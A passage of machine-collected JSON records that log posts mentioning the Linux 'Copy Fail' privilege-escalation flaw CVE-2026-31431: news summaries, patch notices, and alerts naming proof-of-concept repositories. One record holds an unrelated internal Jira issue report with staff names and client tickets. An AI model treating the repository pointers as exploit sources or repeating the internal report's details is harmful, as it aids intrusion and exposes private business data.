"9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://bsky.app/profile/kitafox.bsky.social/post/3ml7zatjnfv2f", "content": "CISA\u304c\u65e2\u77e5\u306e\u60aa\u7528\u3055\u308c\u305f\u8106\u5f31\u6027\u30921\u4ef6\u30ab\u30bf\u30ed\u30b0\u306b\u8ffd\u52a0 \n\nCISA Adds One Known Exploited Vulnerability to Catalog  #CISA (May 1)\n\nCVE-2026-31431 Linux\u30ab\u30fc\u30cd\u30eb\u306b\u304a\u3051\u308b\u30b9\u30d5\u30a3\u30a2\u9593\u306e\u4e0d\u9069\u5207\u306a\u30ea\u30bd\u30fc\u30b9\u8ee2\u9001\u306e\u8106\u5f31\u6027 \n\nwww.cisa.gov/news-events/...", "creation_timestamp": "2026-05-07T01:00:15.466984Z"}, {"uuid": "96c2d2a3-934d-41f3-96b6-9e4eb24df34c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://bsky.app/profile/artstradamagazine.bsky.social/post/3mla3gkzpik2v", "content": "CVE-2026-31431, commonly known as Copy Fail, is a vulnerability in the Linux kernel that allows unauthorized privilege escalation,[1][2] disclosed by security firm Theori to the public on 29 April 2026 and to the Linux kernel security team five weeks prior\nen.wikipedia.org/wiki/Copy_Fail", "creation_timestamp": "2026-05-07T01:39:18.069183Z"}, {"uuid": "ff121eef-9222-45d5-8af3-36bd72b70573", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://bsky.app/profile/Ubuntu.activitypub.awakari.com.ap.brid.gy/post/3mla5x5pmkve2", "content": "Linux Kernel Vulnerability \u201cCopy Fail\u201d (CVE-2026-31431) \u2014 Immediate Action Required bb77: By now, most distributions should offer fixed kernel versions. Unfortunately, Ubuntu has not yet rele...\n\n\nOrigin | Interest | Match", "creation_timestamp": "2026-05-07T02:24:20.826807Z"}, {"uuid": "ee2947b7-19c8-45d7-8b7b-02ec866169a9", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://bsky.app/profile/pmloik.bsky.social/post/3mla6bbmmbf2m", "content": "Top 3 CVE for last 7 days:\nCVE-2026-31431: 516 interactions\nCVE-2026-41940: 123 interactions\nCVE-2025-31431: 29 interactions\n\n\nTop 3 CVE for yesterday:\nCVE-2026-0300: 19 interactions\nCVE-2026-31431: 8 interactions\nCVE-2026-23918: 5 interactions\n", "creation_timestamp": "2026-05-07T02:29:59.211406Z"}, {"uuid": "9f575a6f-0185-43e5-8a71-6a1179142a9b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://t.me/GithubRedTeam/83095", "content": "\ud83d\udea8 GitHub \u76d1\u63a7\u6d88\u606f\u63d0\u9192\n\n\ud83d\udea8 \u53d1\u73b0\u5173\u952e\u8bcd\uff1a #CVE-2026\n\n\ud83d\udce6 \u9879\u76ee\u540d\u79f0\uff1a CVE-2026-31431\n\ud83d\udc64 \u9879\u76ee\u4f5c\u8005\uff1a StarxSky\n\ud83d\udee0 \u5f00\u53d1\u8bed\u8a00\uff1a Python\n\u2b50 Star\u6570\u91cf\uff1a 0  |  \ud83c\udf74 Fork\u6570\u91cf\uff1a 0\n\ud83d\udcc5 \u66f4\u65b0\u65f6\u95f4\uff1a 2026-05-06 16:57:43\n\n\ud83d\udcdd \u9879\u76ee\u63cf\u8ff0\uff1a\n\"Copy Fail\" \n\n\ud83d\udd17 \u70b9\u51fb\u8bbf\u95ee\u9879\u76ee\u5730\u5740", "creation_timestamp": "2026-05-06T17:00:05.000000Z"}, {"uuid": "6cb638ae-b23b-4b59-aaed-41eb5a6f1211", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "cve-2026-31431", "type": "seen", "source": "https://bsky.app/profile/newsyc200.bsky.social/post/3ml7fcqcilc2m", "content": "CVE-2026-31431: Copy Fail vs. rootless containers https://www.dragonsreach.it/2026/05/04/cve-2026-31431-copy-fail-rootless-containers/ (http://news.ycombinator.com/item?id=48017813)", "creation_timestamp": "2026-05-06T19:03:24.449786Z"}, {"uuid": "c07a7798-672b-4083-8e70-71533f4ad62e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://bsky.app/profile/getpokemon7.bsky.social/post/3ml7iojj2322z", "content": "Linux\u306e\u65b0\u305f\u306a\u300c\u30b3\u30d4\u30fc\u5931\u6557\u300d\u8106\u5f31\u6027\u306b\u3088\u308a\u3001\u4e3b\u8981\u30c7\u30a3\u30b9\u30c8\u30ea\u30d3\u30e5\u30fc\u30b7\u30e7\u30f3\u3067\u30eb\u30fc\u30c8\u30a2\u30af\u30bb\u30b9\u304c\u53ef\u80fd\u306b\n\n\u30b5\u30a4\u30d0\u30fc\u30bb\u30ad\u30e5\u30ea\u30c6\u30a3\u7814\u7a76\u8005\u3089\u306f\u3001Linux\u306e\u30ed\u30fc\u30ab\u30eb\u6a29\u9650\u6607\u683c\uff08LPE\uff09\u306e\u8106\u5f31\u6027\u306e\u8a73\u7d30\u3092\u660e\u3089\u304b\u306b\u3057\u305f\u3002\u3053\u306e\u8106\u5f31\u6027\u3092\u5229\u7528\u3059\u308c\u3070\u3001\u6a29\u9650\u3092\u6301\u305f\u306a\u3044\u30ed\u30fc\u30ab\u30eb\u30e6\u30fc\u30b6\u30fc\u304croot\u6a29\u9650\u3092\u53d6\u5f97\u3067\u304d\u308b\u53ef\u80fd\u6027\u304c\u3042\u308b\u3002\n\nCVE-2026-31431\uff08CVSS\u30b9\u30b3\u30a2\uff1a7.8\uff09\u3068\u3057\u3066\u8ffd\u8de1\u3055\u308c\u3066\u3044\u308b\u6df1\u523b\u5ea6\u306e\u9ad8\u3044\u8106\u5f31\u6027\u306f\u3001Xint.io\u3068Theori\u306b\u3088\u3063\u3066Copy Fail\u3068\u3044\u3046\u30b3\u30fc\u30c9\u30cd\u30fc\u30e0\u304c\u4ed8\u3051\u3089\u308c\u307e\u3057\u305f\u3002\n\n\u300c\u6a29\u9650\u306e\u306a\u3044\u30ed\u30fc\u30ab\u30eb\u30e6\u30fc\u30b6\u30fc\u306f\u3001Linux\u30b7\u30b9\u30c6\u30e0\u4e0a\u306e\u8aad\u307f\u53d6\u308a\u53ef\u80fd\u306a\u30d5\u30a1\u30a4\u30eb\u306e\u30da\u30fc\u30b8\u30ad\u30e3\u30c3\u30b7\u30e5\u306b4\u30d0\u30a4\u30c8\u306e...", "creation_timestamp": "2026-05-06T20:03:45.381561Z"}, {"uuid": "8f5a5709-510c-442f-ab1e-2b93e84ee84d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://bsky.app/profile/getpokemon7.bsky.social/post/3ml7isk3o222z", "content": "Linux\u30ab\u30fc\u30cd\u30eb\u306e\u300c\u30b3\u30d4\u30fc\u5931\u6557\u300d\u30ed\u30b8\u30c3\u30af\u306e\u6b20\u9665\u306b\u3088\u308a\u30b7\u30b9\u30c6\u30e0\u4e57\u3063\u53d6\u308a\u304c\u53ef\u80fd\u306b\n\nCVE-2026-31431\uff08CVSS\u30b9\u30b3\u30a27.8\uff09\u3068\u3057\u3066\u8ffd\u8de1\u3055\u308c\u3001 \u300cCopy Fail\u300d\u3068\u547c\u3070\u308c\u3066\u3044\u308b\u3053\u306e\u554f\u984c\u306f\u30012017\u5e74\u4ee5\u964d\u306e\u3059\u3079\u3066\u306eLinux\u30c7\u30a3\u30b9\u30c8\u30ea\u30d3\u30e5\u30fc\u30b7\u30e7\u30f3\u306b\u5f71\u97ff\u3092\u4e0e\u3048\u308b\u3068\u8003\u3048\u3089\u308c\u3066\u3044\u307e\u3059\u3002\n\n\u3053\u306e\u30bb\u30ad\u30e5\u30ea\u30c6\u30a3\u4e0a\u306e\u6b20\u9665\u306f\u3001IPsec\u304c\u62e1\u5f35\u30b7\u30fc\u30b1\u30f3\u30b9\u756a\u53f7\uff08ESN\uff09\u306e\u30b5\u30dd\u30fc\u30c8\u306b\u4f7f\u7528\u3059\u308b \u30ab\u30fc\u30cd\u30eb\u306e\u8a8d\u8a3c\u4ed8\u304d\u6697\u53f7\u5316\uff08AEAD\uff09\u30c6\u30f3\u30d7\u30ec\u30fc\u30c8\u306b\u5f71\u97ff\u3092\u4e0e\u3048\u307e\u3059\u3002\n\nTheori\u6c0f\u306b\u3088\u308b\u3068\u3001\u554f\u984c\u306fLinux\u304c\u30da\u30fc\u30b8\u30ad\u30e3\u30c3\u30b7\u30e5\u30da\u30fc\u30b8\u3092\u66f8\u304d\u8fbc\u307f\u53ef\u80fd\u306a\u30b9\u30ad\u30e3\u30c3\u30bf\u30fc\u30ea\u30b9\u30c8\u306b\u914d\u7f6e\u3059\u308b\u3053\u3068\u3001authencesn\u304c\u547c...", "creation_timestamp": "2026-05-06T20:05:58.547194Z"}, {"uuid": "0ed56e38-c11f-4210-b109-e4068d12018e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://bsky.app/profile/infosec.skyfleet.blue/post/3mlak2sysda2m", "content": "Re: Precise disclosure contents for copyfail (Re: [oss-security] CVE-2026-31431: CopyFail: linux local privilege scalation)", "creation_timestamp": "2026-05-07T06:01:07.477112Z"}, {"uuid": "7c62faa7-9a87-4bc5-bca9-51454af6c1a8", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://bsky.app/profile/Ubuntu.activitypub.awakari.com.ap.brid.gy/post/3mlapldvvpad2", "content": "Linux Kernel Vulnerability \u201cCopy Fail\u201d (CVE-2026-31431) \u2014 Immediate Action Required They have released midigations for all affected versions on April 30: Fixes available for CVE-2026-31431 (C...\n\n\nOrigin | Interest | Match", "creation_timestamp": "2026-05-07T07:39:55.181572Z"}, {"uuid": "42ca6181-95ab-4113-92a5-39a8313ea1c9", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://bsky.app/profile/advisoryics.bsky.social/post/3ml4gr4dibs2h", "content": "CVE-2026-31431 ('Copy Fail') added to CISA KEV May 1. Theori's Xint Code disclosed this 9-year-old Linux kernel LPE on 4/29.\n\nWe reviewed 3,800 CISA ICS + 12,468 vendor advisories for ICS Linux exposure.\n\nICSAP-AN-26-001: www.icsadvisoryproject.com/ics-advisory...\n\n#ICS #OTSecurity #CopyFail", "creation_timestamp": "2026-05-05T14:51:24.220529Z"}, {"uuid": "4baeceee-0088-4808-8275-37739f0ced5d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://bsky.app/profile/rockylinux.org/post/3mlbqtqh66r2c", "content": "CopyFail (CVE-2026-31431) is serious. Patches are out now for Rocky Linux 8.10, 9.8, and 10.1. One command and a reboot gets you covered. Full details in the blog. Stay patched. \ud83d\udc27\n\nsudo dnf --refresh update 'kernel*'\n\n#RockyLinux #Linux #LinuxSecurity", "creation_timestamp": "2026-05-07T17:35:06.437734Z"}, {"uuid": "cddf4091-d7a4-4935-801b-b271941d1ce5", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://bsky.app/profile/dbt3.ch/post/3mlb64luoey26", "content": "A nine-year Linux kernel bug is being actively exploited right now. CVE-2026-31431 (Copy Fail) gives any unprivileged local user a root shell. Works every time. Leaves no trace on disk. Patch status + fixes for Proxmox, Debian, and more in the video.\n\n\u27a1\ufe0f\u27a1\ufe0f Watch Here: https://youtu.be/LwqEUiuXmbg", "creation_timestamp": "2026-05-07T12:00:02.412568Z"}, {"uuid": "28ea2d62-3332-4291-94ae-621ffa7b617d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://bsky.app/profile/dbt3.ch/post/3mlbsad6t4v22", "content": "ICYMI: CVE-2026-31431 (Copy Fail) gives any unprivileged local user a ROOT SHELL. Works every time. Leaves no trace on disk. Patch status + fixes for Proxmox, Debian, and more.\n\n\u27a1\ufe0f\u27a1\ufe0f Watch Here: https://youtu.be/LwqEUiuXmbg", "creation_timestamp": "2026-05-07T18:00:02.446570Z"}, {"uuid": "feba79d0-51f5-4bec-b77d-85a3b7372870", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://t.me/GithubRedTeam/83238", "content": "\ud83d\udea8 GitHub \u76d1\u63a7\u6d88\u606f\u63d0\u9192\n\n\ud83d\udea8 \u53d1\u73b0\u5173\u952e\u8bcd\uff1a #CVE-2026\n\n\ud83d\udce6 \u9879\u76ee\u540d\u79f0\uff1a Copy_Fail2-Electric_Boogaloo\n\ud83d\udc64 \u9879\u76ee\u4f5c\u8005\uff1a 0xdeadbeefnetwork\n\ud83d\udee0 \u5f00\u53d1\u8bed\u8a00\uff1a C\n\u2b50 Star\u6570\u91cf\uff1a 0  |  \ud83c\udf74 Fork\u6570\u91cf\uff1a 0\n\ud83d\udcc5 \u66f4\u65b0\u65f6\u95f4\uff1a 2026-05-07 15:41:44\n\n\ud83d\udcdd \u9879\u76ee\u63cf\u8ff0\uff1a\nCopy Fail 2 \u2014 Electric Boogaloo: unpriv LPE via xfrm ESP-in-UDP MSG_SPLICE_PAGES no-COW page-cache write (sibling of CVE-2026-31431)\n\n\ud83d\udd17 \u70b9\u51fb\u8bbf\u95ee\u9879\u76ee\u5730\u5740", "creation_timestamp": "2026-05-07T16:00:05.000000Z"}, {"uuid": "87089bda-4cd1-4400-a677-1561249cb174", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://bsky.app/profile/beitmenotyou.online/post/3mlbse46iyk2k", "content": "Cloudflare shared how it handled Copy Fail, the Linux flaw CVE-2026-31431.\n\nThe lesson: patch quickly, monitor behaviour, and use only official distro updates.\n\nWhat is your kernel update routine?\n\nblog.cloudflare.com/copy-fail-li...\n\n#Linux #Security", "creation_timestamp": "2026-05-07T18:02:13.084572Z"}, {"uuid": "7a6291b6-aac1-430b-8236-544a70b5f3d2", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://bsky.app/profile/getpokemon7.bsky.social/post/3mlc64agrvk2k", "content": "\u30b3\u30d4\u30fc\u5931\u6557: \u65b0\u3057\u3044LINUX\u30d0\u30b0\u304c\u30da\u30fc\u30b8\u30ad\u30e3\u30c3\u30b7\u30e5\u306e\u7834\u640d\u306b\u3088\u308aROOT\u3092\u6709\u52b9\u306b\u3057\u307e\u3059\n\nXint Code \u306e\u7814\u7a76\u8005\u306f\u3001\u91cd\u5927\u306a Linux \u306e\u6b20\u9665\u304c CVE-2026-31431\uff08CVSS \u30b9\u30b3\u30a2 7.8\uff09\u3068\u3057\u3066\u8ffd\u8de1\u3055\u308c\u3001Copy Fail \u3068\u547c\u3070\u308c\u3066\u3044\u308b\u3053\u3068\u3092\u8b66\u544a\u3057\u3066\u3044\u307e\u3059\u3002\u30ed\u30fc\u30ab\u30eb\u3067\u7279\u6a29\u306e\u306a\u3044\u30e6\u30fc\u30b6\u30fc\u304c\u3001\u4efb\u610f\u306e\u53ef\u8aad\u53ef\u80fd\u30d5\u30a1\u30a4\u30eb\u306e\u30da\u30fc\u30b8\u30ad\u30e3\u30c3\u30b7\u30e5\u306b4\u3064\u306e\u5236\u5fa1\u3055\u308c\u305f\u30d0\u30a4\u30c8\u3092\u66f8\u304d\u8fbc\u3080\u3053\u3068\u3092\u53ef\u80fd\u306b\u3057\u3001\u4e3b\u8981\u306a\u914d\u5e03\u7269\u3067\u30eb\u30fc\u30c8\u3078\u306e\u30a8\u30b9\u30ab\u30ec\u30fc\u30b7\u30e7\u30f3\u3092\u53ef\u80fd\u306b\u3057\u307e\u3059\u3002\n\n\u3053\u306e\u30d0\u30b0\u306f\u3001AF_ALG \u3068 splice() \u3092\u7d44\u307f\u5408\u308f\u305b\u3066\u3001\u4efb\u610f\u306e\u8aad\u307f\u53d6\u308a\u53ef\u80fd\u306a\u30d5\u30a1\u30a4\u30eb\u306e\u30da\u30fc\u30b8\u30ad\u30e3\u30c3\u30b7\u30e5\u306b 4 \u30d0\u30a4\u30c8\u3092\u66f8\u304d\u8fbc\u2026", "creation_timestamp": "2026-05-07T21:32:32.454614Z"}, {"uuid": "6dac81a0-32b1-4f72-a52d-86ecdbd314d6", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://bsky.app/profile/o2cloud.bsky.social/post/3mlbgryvtcx2q", "content": "\ud83d\udd17 CVE : CVE-2024-41073, CVE-2024-53216, CVE-2025-37861, CVE-2025-40252, CVE-2025-68724, CVE-2025-68741, CVE-2025-71238, CVE-2026-23097, CVE-2026-23136, CVE-2026-23191, CVE-2026-23193, CVE-2026-23243, CVE-2026-23270, CVE-2026-23401, CVE-2026-31402, CVE-2026-31419, CVE-2026-31431, CVE-2026-31532", "creation_timestamp": "2026-05-07T14:35:12.852611Z"}, {"uuid": "79c60e31-f0b3-414a-9055-860d59be1fc5", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://gist.github.com/vndmtrx/24befcc16625aca6d6a7e95e1929fb16", "content": "", "creation_timestamp": "2026-05-07T22:18:28.000000Z"}, {"uuid": "20e274e0-9e03-4e4a-848d-00d72770b0fa", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://gist.github.com/ef-edulog/d2370436ce245f64679c196e13b420c3", "content": "\n\n\n\n\nJira Report \u2014 DO / IM / S2\n\n  :root {\n    --bg: #fff; --bg2: #f5f4ef; --bg3: #ebebeb;\n    --tx: #1a1a1a; --tx2: #666660; --tx3: #999994;\n    --info: #185FA5; --bdr: rgba(0,0,0,0.12); --bdr2: rgba(0,0,0,0.22);\n    --r: 8px; --rl: 12px;\n    --font: -apple-system, BlinkMacSystemFont, 'Segoe UI', sans-serif;\n    --mono: 'SF Mono','Fira Code',monospace;\n  }\n  @media(prefers-color-scheme:dark){\n    :root{--bg:#1e1e1c;--bg2:#2a2a28;--bg3:#333330;--tx:#f0efe8;--tx2:#a8a79f;--tx3:#6e6e68;--info:#85B7EB;--bdr:rgba(255,255,255,0.1);--bdr2:rgba(255,255,255,0.18)}\n  }\n  *{box-sizing:border-box;margin:0;padding:0}\n  body{font-family:var(--font);background:var(--bg);color:var(--tx);padding:24px;max-width:1300px;margin:0 auto}\n  h1{font-size:18px;font-weight:500;margin-bottom:4px}\n  .sub{font-size:12px;color:var(--tx2);margin-bottom:20px}\n  .tabs{display:flex;gap:6px;margin-bottom:1.25rem;flex-wrap:wrap}\n  .tab{padding:5px 13px;border:0.5px solid var(--bdr2);border-radius:var(--r);font-size:13px;cursor:pointer;background:var(--bg);color:var(--tx2)}\n  .tab.active{background:var(--bg2);color:var(--tx);font-weight:500}\n  .tab:hover:not(.active){background:var(--bg2)}\n  .legend{display:flex;gap:14px;flex-wrap:wrap;margin-bottom:1rem;font-size:11px;color:var(--tx2);align-items:center}\n  .li{display:flex;align-items:center;gap:4px}\n  .ld{width:9px;height:9px;border-radius:2px}\n  .summary-grid{display:grid;grid-template-columns:repeat(3,minmax(0,1fr));gap:8px;margin-bottom:1.25rem}\n  .metric{background:var(--bg2);border-radius:var(--r);padding:10px 12px}\n  .ml{font-size:11px;color:var(--tx2);margin-bottom:3px}\n  .mv{font-size:20px;font-weight:500}\n  .project-block{margin-bottom:1.1rem;border:0.5px solid var(--bdr);border-radius:var(--rl);overflow:hidden}\n  .ph{padding:9px 14px;border-bottom:0.5px solid var(--bdr);display:flex;align-items:center;justify-content:space-between}\n  .pn{font-size:13px;font-weight:500}\n  .pm{font-size:11px;color:var(--tx2)}\n  .th{padding:5px 14px;font-size:11px;font-weight:500;color:var(--tx2);background:var(--bg2);display:flex;align-items:center;gap:6px;border-top:0.5px solid var(--bdr)}\n  .tc{background:var(--bg3);color:var(--tx2);padding:1px 6px;border-radius:var(--r);font-size:10px}\n  .cols{display:grid;grid-template-columns:80px 1fr 86px 82px 82px 80px 98px;gap:4px;padding:4px 14px;font-size:10px;color:var(--tx3);background:var(--bg2);border-top:0.5px solid var(--bdr)}\n  .ir{display:grid;grid-template-columns:80px 1fr 86px 82px 82px 80px 98px;gap:4px;padding:6px 14px;align-items:start;border-top:0.5px solid var(--bdr);font-size:11px}\n  .ir.stale{background:rgba(250,238,218,0.3)}\n  .ir.highest{background:rgba(252,235,235,0.35)}\n  .ir.overdue{background:rgba(252,235,235,0.45)}\n  .ir.stale.highest,.ir.stale.overdue{background:rgba(250,220,200,0.45)}\n  @media(prefers-color-scheme:dark){\n    .ir.stale{background:rgba(99,56,6,0.2)}.ir.highest{background:rgba(121,31,31,0.2)}\n    .ir.overdue{background:rgba(121,31,31,0.3)}.ir.stale.highest,.ir.stale.overdue{background:rgba(110,40,6,0.28)}\n  }\n  .ik{color:var(--info);font-size:10px;font-family:var(--mono);white-space:nowrap;text-decoration:none}\n  .ik:hover{text-decoration:underline}\n  .is{color:var(--tx);line-height:1.4;overflow:hidden;display:-webkit-box;-webkit-line-clamp:2;-webkit-box-orient:vertical}\n  .ia{color:var(--tx2);font-size:10px;overflow:hidden;text-overflow:ellipsis;white-space:nowrap}\n  .dt{font-size:10px;white-space:nowrap}\n  .upd-ok{color:var(--tx2)}.upd-stale{color:#BA7517;font-weight:500}\n  .due-ok{color:var(--tx2)}.due-over{color:#A32D2D;font-weight:500}\n  .cr{color:var(--tx2)}\n  @media(prefers-color-scheme:dark){.upd-stale{color:#FAC775}.due-over{color:#F7C1C1}}\n  .dot-h{display:inline-block;width:5px;height:5px;border-radius:50%;background:#E24B4A;margin-right:2px;vertical-align:middle}\n  .dot-s{display:inline-block;width:5px;height:5px;border-radius:50%;background:#EF9F27;margin-right:2px;vertical-align:middle}\n  .dot-d{display:inline-block;width:5px;height:5px;border-radius:50%;background:#D85A30;margin-right:2px;vertical-align:middle}\n  .sb{font-size:10px;padding:2px 6px;border-radius:var(--r);text-align:center;white-space:nowrap}\n  .s-ip{background:#FAEEDA;color:#854F0B}.s-td{background:#E1F5EE;color:#0F6E56}\n  .s-oi{background:#FCEBEB;color:#A32D2D}.s-xx{background:var(--bg2);color:var(--tx2)}\n  @media(prefers-color-scheme:dark){\n    .s-ip{background:#633806;color:#FAC775}.s-td{background:#085041;color:#9FE1CB}.s-oi{background:#791F1F;color:#F7C1C1}\n  }\n  .empty{padding:16px;text-align:center;color:var(--tx3);font-size:12px}\n  .footer{font-size:11px;color:var(--tx3);margin-top:24px}\n\n\n\n\nJira Active Issues Report \u2014 DO / IM / S2\n\nGenerated May 07, 2026 at 10:33 PM  \u00b7  Excludes Done, Fixed, Canceled, Deferred  \u00b7  https://karrostech.atlassian.net\n\nLast 24 hrs24\u201348 hrs ago2\u20137 days agoOlder than 7 days\n\n\n  Highest priority\n  Stale \u22655 business days\n  Due date missed\n\n\n\n\n\nDO \u2014 Edulog DevOps\n6\n\nIM \u2014 Incident Management\n2\n\nS2 \u2014 Soc-2 & Security\n0\n            \n\n              \n\n                DO \u2014 Edulog DevOps\n                6 active issues\n              \n              \n\n                KeySummaryAssignee\n                CreatedLast updatedDue dateStatus\n              \nStory 2\n                    \n\n                      DO-2057\n                      Hernando, FL - Please update Talend columns for Phone and Email \n                      Cory Emlen\n                      May 7, '26\n                      May 7, '26\n                      \u2014\n                      Verification\n                    \n                    \n\n                      DO-2053\n                      Thrive, AB - Please update ASCI\n                      Cory Emlen\n                      May 7, '26\n                      May 7, '26\n                      \u2014\n                      Verification\n                    \nTask 4\n                    \n\n                      DO-2056\n                      Tangipahoa, LA - Please Add \"DIV\" Program Code Back Into Import\n                      Cory Emlen\n                      May 7, '26\n                      May 7, '26\n                      \u2014\n                      IN PROGRESS\n                    \n                    \n\n                      DO-2055\n                      Montour-PA - Set up additional ASDI for sandbox 2627sy\n                      Cory Emlen\n                      May 7, '26\n                      May 7, '26\n                      \u2014\n                      Verification\n                    \n                    \n\n                      DO-2054\n                      Setup 2TIERPLAY ASDI for Cambridge, MA\n                      Cory Emlen\n                      May 7, '26\n                      May 7, '26\n                      \u2014\n                      Verification\n                    \n                    \n\n                      DO-2052\n                      PP is Grafana stuck, or working and just delayed or not updating? \n                      Eric Fischl\n                      May 7, '26\n                      May 7, '26\n                      \u2014\n                      IN PROGRESS\n                    \n            \n\n              \n\n                IM \u2014 Incident Management\n                2 active issues\n              \n              \n\n                KeySummaryAssignee\n                CreatedLast updatedDue dateStatus\n              \nStory 1\n                    \n\n                      IM-7577\n                      I am unable to see any of the buses that had tablets installed yesterday in parent portal lite. Parents are receiving a message that \"no vehicle is currently assigned to this route\"\n                      Brandon Donnelson\n                      May 7, '26\n                      May 7, '26\n                      \u2014\n                      Blocker\n                    \nTask 1\n                    \n\n                      IM-7578\n                      East, China - Students Auto-Assigning to the Wrong Stop\n                      \u2014\n                      May 7, '26\n                      May 7, '26\n                      \u2014\n                      Open Issue\n                    \n\n\n\nDO \u2014 Edulog DevOps\n0\n\nIM \u2014 Incident Management\n0\n\nS2 \u2014 Soc-2 & Security\n0\n\n\n\nDO \u2014 Edulog DevOps\n9\n\nIM \u2014 Incident Management\n6\n\nS2 \u2014 Soc-2 & Security\n0\n            \n\n              \n\n                DO \u2014 Edulog DevOps\n                9 active issues\n              \n              \n\n                KeySummaryAssignee\n                CreatedLast updatedDue dateStatus\n              \nBug 2\n                    \n\n                      DO-2034\n                      DP V2 (build 180/AV1): EDP gateway /v4.0/vehicles/search returns 0 vehicles for development-test-school tenant\n                      \u2014\n                      May 3, '26\n                      May 3, '26\n                      \u2014\n                      Backlog\n                    \n                    \n\n                      DO-2033\n                      DP V2 (build 180/AV1): POST /apilive/setting/event/add returns 500 after login (tenantId='', deviceId=0)\n                      \u2014\n                      May 3, '26\n                      May 3, '26\n                      \u2014\n                      Backlog\n                    \nTask 7\n                    \n\n                      DO-2042\n                      Client Cancelation for Kuna Joint School District, ID - May 29 shutdown\n                      Vader\n                      May 5, '26\n                      May 6, '26\n                      \u2014\n                      On hold\n                    \n                    \n\n                      DO-2041\n                      Remove the test server - fr-routing-legacy-test  it is no longer needed.\n                      \u2014\n                      May 5, '26\n                      May 5, '26\n                      \u2014\n                      Backlog\n                    \n                    \n\n                      DO-2040\n                      Remove queuedNotification lambda function when associated NotificationService changes are deployed\n                      \u2014\n                      May 4, '26\n                      May 4, '26\n                      \u2014\n                      Backlog\n                    \n                    \n\n                      DO-2037\n                      Deploy Hafeez's Data Build Tool\n                      Boluwatife Olaifa\n                      May 4, '26\n                      May 7, '26\n                      May 4, '26\n                      IN PROGRESS\n                    \n                    \n\n                      DO-2032\n                      Need script run on Cobb to remove duplicate locations\n                      Vader\n                      May 1, '26\n                      May 1, '26\n                      \u2014\n                      To Do\n                    \n                    \n\n                      DO-2028\n                      All legacy PP ingestions have not run:\n                      Josiah Brown\n                      May 1, '26\n                      May 7, '26\n                      \u2014\n                      Backlog\n                    \n                    \n\n                      DO-2027\n                      Patch infra with CopyFail (CVE-2026-31431)\n                      Josiah Brown\n                      May 1, '26\n                      May 1, '26\n                      \u2014\n                      Backlog\n                    \n            \n\n              \n\n                IM \u2014 Incident Management\n                6 active issues\n              \n              \n\n                KeySummaryAssignee\n                CreatedLast updatedDue dateStatus\n              \nStory 6\n                    \n\n                      IM-7574\n                      Gwinnett, GA - Missing Data in Telematics\n                      Josiah Brown\n                      May 5, '26\n                      May 6, '26\n                      \u2014\n                      WORK IN PROGRESS\n                    \n                    \n\n                      IM-7571\n                      Cleveland, OH - Client Reported Delays in Both Telematics and with Parent Portal Messages this Morning\n                      \u2014\n                      May 5, '26\n                      May 5, '26\n                      \u2014\n                      Open Issue\n                    \n                    \n\n                      IM-7569\n                      Zonar 